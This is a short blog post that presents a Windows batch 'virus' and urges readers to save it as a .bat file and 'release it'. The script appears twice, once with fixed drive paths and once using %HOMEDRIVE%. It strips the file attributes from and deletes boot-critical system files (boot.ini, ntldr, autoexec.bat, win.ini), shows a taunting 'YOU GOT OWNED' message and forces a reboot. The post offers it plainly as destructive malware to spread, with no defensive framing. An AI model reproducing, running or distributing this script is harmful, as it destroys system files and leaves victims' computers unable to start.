Breaking News
recent

Virus: Your last start:


After running this virus you should take a last lok at your desktop. Next time the computer starts, it will start-
Paste this code in a textdocument:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown –r -f -t 7 -c "This just isn’t your day :)”
Save it as something.bat and put it somewhere.
If you don't know on which Drive the OS has been installed simply write this code instead:
@echo off
attrib -r -s -h %HOMEDRIVE%\autoexec.bat
del %HOMEDRIVE%\autoexec.bat
attrib -r -s -h %HOMEDRIVE%\boot.ini
del %HOMEDRIVE%\boot.ini
attrib -r -s -h %HOMEDRIVE%\ntldr
del %HOMEDRIVE%\ntldr
attrib -r -s -h %HOMEDRIVE%\windows\win.ini
del %HOMEDRIVE%\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -r -f-t 7 -c "This just isn’t your day :)”
Save it as something.bat and realease it ;)



No comments:

@problemhunt.com. Powered by Blogger.